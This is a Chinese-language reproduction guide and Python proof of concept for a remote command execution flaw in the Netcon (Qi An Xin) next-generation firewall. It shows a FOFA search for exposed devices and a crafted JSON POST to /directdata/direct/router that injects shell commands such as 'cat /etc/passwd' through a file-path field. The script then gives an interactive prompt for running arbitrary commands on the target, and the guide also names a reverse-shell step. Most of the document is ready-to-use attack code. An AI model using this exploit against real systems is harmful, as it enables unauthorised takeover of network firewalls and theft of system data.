简介
网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。凭借超强的应用识别能力,下一代防火墙可深入洞察网络流量中的用户、应用和内容,借助全新的高性能单路径异构并行处理引擎,在互联网出口、数据中心边界、应用服务前端等场景提供高效的应用层一体化安全防护,帮助用户安全地开展业务并降低安全成本。
漏洞概述
存在远程命令执行,漏洞攻击者可以获取服务器权限。
影响范围
奇安信 网康下一代防火墙
FOFA
复现过程
fofa搜索:
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLiAzNfRHLGZkRGZkRfJ3bs92YsYTMfVmepNHL4VEVOlXU65UMRpHW4Z0MMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2X0hXZ0xCMx81dvRWYoNHLrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdssmch1mclRXY39CXldWYtlWPzNXZj9mcw1ycz9WL49zZuBnL2IDO3UjMycTM0EDNwEjMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
登录页面:
使用burpsuite进行抓包,并构造数据包:
变更发包方式:POST /directdata/direct/router HTTP/1.1
添加POST数据:{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
访问test.txt获得数据:
反弹shell
POC
# @Author:ximo
import requests
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+----------奇安信 网康下一代防火墙-------------')
print('+------------------------------------------')
def poc_1(target_url): # 判断是否存在漏洞
vuln_url = target_url + '/directdata/direct/router'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)',
"Content-Type": "application/json",
}
data = '{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}'
try:
# 防止报错
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# 第一次请求将 命令执行结果输入到test.txt中
response1 = requests.post(url=vuln_url,headers=headers,data=data,verify=False,timeout=5)
# 判断页面返回结果是否正确
if response1.status_code==200 and '"result":{"success":true}' in response1.text:
print('目标{}可能存在漏洞,正在执行 cat /etc/passwd'.format(target_url))
time.sleep(3)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# 第二次请求返回执行命令结果的页面信息
response2=requests.get(url=target_url + '/test.txt',headers=headers,verify=False)
if response2.status_code==200 and 'root:x:0:0:root:/root:/bin/bash' in response2.text:
print('结果为:\n{}'.format(response2.text))
# 执行其他命令
while 1:
cmd = input('输入想要执行的命令,输入exit退出\nCmd>>>')
if cmd =='exit':
break
else:
poc_2(target_url,cmd)
else:
print('目标不存在漏洞')
except Exception as e:
print('请求失败')
def poc_2(target_url,cmd): # 执行任意命令
vuln_url = target_url + '/directdata/direct/router'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)',
"Content-Type": "application/json",
}
data = '{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;%s >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}' % (cmd)
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# 执行任意命令,结果输入到test.txt中
response1 = requests.post(url=vuln_url,headers=headers,data=data,verify=False,timeout=5)
if response1.status_code==200 and '"result":{"success":true}' in response1.text:
print('正在执行 {}'.format(cmd))
time.sleep(3)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# 请求命令结果的页面
response2=requests.get(url=target_url + '/test.txt',headers=headers,verify=False)
print('结果为:\n{}'.format(response2.text))
except Exception as e:
print('请求失败')
if __name__ == '__main__':
title()
target_url = str(input("\033[35m请输入url\nUrl >>> \033[0m"))
poc_1(target_url)